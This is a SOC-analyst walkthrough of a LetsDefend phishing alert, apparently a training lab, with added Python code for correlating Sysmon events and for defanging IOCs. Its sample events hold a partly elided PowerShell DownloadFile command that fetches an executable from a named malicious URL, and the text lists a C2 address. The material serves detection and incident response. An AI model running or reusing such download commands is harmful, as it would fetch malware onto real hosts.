Above is the alert we see; it is a "Medium" severity alert.
We start by taking ownership of the alert and begin investigating it.
Next we go to the investigation channel and create the case for this investigation.
The next step for us is to start the playbook.
We look up the file hash on VirusTotal, and here is what we find:
We can conclude that the file is malicious, since 31 out of 67 vendors have flagged it as malicious.
After searching for the IP in the Log Management tab, we find the following information:
- At 8:41 a file named `C:\Users\LetsDefend\Downloads\edit1-invoice.docm.zip` was created (EventID 11 - File Created)
- The user opens the document, and a macro executes a PowerShell command that downloads the remote resource `messbox.exe` from hxxp[:]//www[.]greyhathacker[.]net/tools/messbox[.]exe and saves it as `mess.exe`
- PowerShell caused a DNS lookup for the C2 host (92[.]204[.]221[.]16)
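As an added example (not part of the original walkthrough), here is a small Python correlation that reconstructs the same chain from Sysmon-style events: an Office application spawning PowerShell, followed by a DNS query and a dropped executable from that PowerShell process. The event records are constructed to mirror the findings above; the browser path, the exact timestamps and the severity thresholds are assumptions.

```python
"""Correlate Sysmon-style endpoint events into the Office -> PowerShell -> download chain.

Added example, not code from the original LetsDefend walkthrough. The events below
are constructed to mirror the write-up's findings; field names follow Sysmon's
(EventID 1 ProcessCreate, 11 FileCreate, 22 DnsQuery). The severity labels and the
"Downloads folder" origin heuristic are assumptions for this example.
"""
import re
from collections import defaultdict

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (not real log output); ISO timestamps sort lexically.
SAMPLE_EVENTS = [
    {"time": "2024-02-28T08:41:10", "host": "Jayne", "EventID": 11,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",  # assumed download source
     "TargetFilename": r"C:\Users\LetsDefend\Downloads\edit1-invoice.docm.zip"},
    {"time": "2024-02-28T08:42:05", "host": "Jayne", "EventID": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": PS,
     "CommandLine": "powershell.exe -w hidden -c \"...DownloadFile('http://www.greyhathacker.net/tools/messbox.exe', '...\\mess.exe')\""},
    {"time": "2024-02-28T08:42:06", "host": "Jayne", "EventID": 22, "Image": PS,
     "QueryName": "www.greyhathacker.net", "QueryResults": "92.204.221.16;"},
    {"time": "2024-02-28T08:42:07", "host": "Jayne", "EventID": 11, "Image": PS,
     "TargetFilename": r"C:\Users\LetsDefend\AppData\Local\Temp\mess.exe"},
    # Benign noise on another host: PowerShell launched from Explorer, no DNS, no drop.
    {"time": "2024-02-28T09:00:00", "host": "Admin-PC", "EventID": 1,
     "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-Process"},
]


def basename(path):
    """Lower-cased file name of a Windows path ('' when the field is absent)."""
    return (path or "").rsplit("\\", 1)[-1].lower()


def find_office_script_chains(events):
    """Return one finding per Office -> script-host spawn, enriched with what the
    script host did afterwards on the same host (DNS lookups, dropped binaries)."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_host[ev["host"]].append(ev)

    findings = []
    for host, evs in by_host.items():
        for spawn in evs:
            if (spawn["EventID"] != 1
                    or basename(spawn.get("ParentImage")) not in OFFICE_APPS
                    or basename(spawn.get("Image")) not in SCRIPT_HOSTS):
                continue
            before = [e for e in evs if e["time"] < spawn["time"]]
            after = [e for e in evs if e["time"] > spawn["time"]
                     and basename(e.get("Image")) in SCRIPT_HOSTS]
            # Files that landed in Downloads before the spawn: likely the lure document.
            origin = [e["TargetFilename"] for e in before
                      if e["EventID"] == 11 and "\\downloads\\" in e["TargetFilename"].lower()]
            dns = [(e["QueryName"], e.get("QueryResults", "").rstrip(";"))
                   for e in after if e["EventID"] == 22]
            dropped = [e["TargetFilename"] for e in after
                       if e["EventID"] == 11
                       and basename(e["TargetFilename"]).endswith((".exe", ".dll"))]
            urls = URL_RE.findall(spawn.get("CommandLine", ""))
            # Assumption: a spawn alone is medium; network activity or a dropped binary raises it.
            severity = "high" if dns or dropped else "medium"
            findings.append({"host": host, "time": spawn["time"],
                             "parent": basename(spawn["ParentImage"]),
                             "child": basename(spawn["Image"]),
                             "origin_files": origin, "urls": urls, "dns": dns,
                             "dropped": dropped, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in find_office_script_chains(SAMPLE_EVENTS):
        print(f"[{f['severity'].upper()}] {f['host']} {f['time']}: {f['parent']} -> {f['child']}")
        for name, ip in f["dns"]:
            print(f"  DNS  {name} -> {ip}")
        for path in f["dropped"]:
            print(f"  DROP {path}")
```

The key design point is that the parent/child pair alone only gives a medium-confidence signal; the same Office-to-PowerShell spawn followed by a DNS query and an executable written from the script host is what turns it into the high-severity finding the playbook records.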
We search for the file name in the Email Security tab and find the email that was used to deliver this file to Jayne:
From: jake.admin@cybercommunity.info
To: jayne@letsdefend.io
Subject: February Membership Fee
Date: Feb, 28, 2024, 08:12 AM
Action: Allowed
Attachment: edit1-invoice.docm.zip
Password: infected
Since we know that the file is malicious and was executed on the host Jayne, we need to contain that host.
Host is successfully contained.
Defined threat indicator: Other
Check if the malware is quarantined/cleaned: Not quarantined
The malware is: malicious
C2: accessed
Containment is done.
Artifacts added:
Analyst's note added:
```
On February 28, 2024, at 08:42 AM, a user on host Jayne (IP: 172.16.17.198) opened a malicious macro-enabled Word document named edit1-invoice.docm. The embedded macro executed a PowerShell command that attempted to download a remote executable from www[.]greyhathacker[.]net (92.204.221[.]16). This activity was logged by Sysmon and other endpoint telemetry, including DNS queries and script block execution.
Earlier, at 08:12 AM, a phishing email originating from jake.admin[@]cybercommunity[.]info was sent to Jayne, containing the malicious document.
This incident is classified as high severity, as it enabled the download and potential execution of malware. Immediate containment measures included isolating the affected host, preserving relevant artifacts, and defanging the IOCs for safe reporting.
```
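The note above defangs its indicators by hand, and the bracketing is not quite uniform (one dot in the IP, all dots in the URL). As an added example that is not from the original post, the following Python helper refangs a note's indicators so they can be searched in the SIEM or on VirusTotal, extracts them with simple regular expressions, and defangs them consistently for the report. The snippet text is constructed from the note, and the short TLD allow-list in the domain pattern is an assumption.

```python
"""Refang, extract and defang IOCs from analyst notes.

Added example, not code from the original write-up. The snippet below is
constructed from the walkthrough's analyst note; the TLD allow-list is a
deliberate simplification so that file names like edit1-invoice.docm are
not mistaken for domains.
"""
import re

# Common defanging conventions seen in reports: hxxp, [.], (.), {.}, [dot], [@].
REFANG_RULES = [
    (re.compile(r"\bhxxp", re.I), "http"),
    (re.compile(r"\bfxp", re.I), "ftp"),
    (re.compile(r"\[:\]//"), "://"),
    (re.compile(r"\[@\]|\(@\)|\{@\}"), "@"),
    (re.compile(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]|\(dot\)", re.I), "."),
]

IOC_PATTERNS = {
    "url": re.compile(r"\b(?:https?|ftp)://[^\s'\"<>()]+", re.I),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    # Assumption: a short TLD allow-list is enough for this note's indicators.
    "domain": re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|io|info)\b", re.I),
}

# Constructed from the analyst note above (not the note verbatim).
NOTE_SNIPPET = (
    "User on host Jayne (IP: 172.16.17.198) opened edit1-invoice.docm; the macro "
    "fetched hxxp[:]//www[.]greyhathacker[.]net/tools/messbox[.]exe (92.204.221[.]16). "
    "Phishing sender: jake.admin[@]cybercommunity[.]info"
)


def refang(text):
    """Turn defanged indicators back into their searchable form."""
    for pattern, repl in REFANG_RULES:
        text = pattern.sub(repl, text)
    return text


def defang(text):
    """Defang every indicator in the text with the [.] / hxxp / [@] convention.

    The text is refanged first, so input that is already (partly) defanged is
    normalised instead of ending up double-bracketed like 92[[.]]204.
    """
    text = refang(text)
    text = re.sub(r"\bhttp(?=s?://)", "hxxp", text, flags=re.I)
    text = re.sub(r"\bftp(?=://)", "fxp", text, flags=re.I)
    text = text.replace("://", "[:]//")
    text = text.replace("@", "[@]")
    text = text.replace(".", "[.]")
    return text


def extract_iocs(text):
    """Return refanged, de-duplicated indicators grouped by kind, in order of appearance."""
    clean = refang(text)
    found = {}
    for kind, pattern in IOC_PATTERNS.items():
        seen = []
        for match in pattern.findall(clean):
            if match not in seen:
                seen.append(match)
        found[kind] = seen
    return found


if __name__ == "__main__":
    for kind, values in extract_iocs(NOTE_SNIPPET).items():
        for value in values:
            print(f"{kind:7} search: {value:45} report: {defang(value)}")
```

Refanging before defanging is what makes `defang` safe to run over a note that an analyst has already partly bracketed; running it twice yields the same output.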
Playbook is now completed:
Now we close the alert.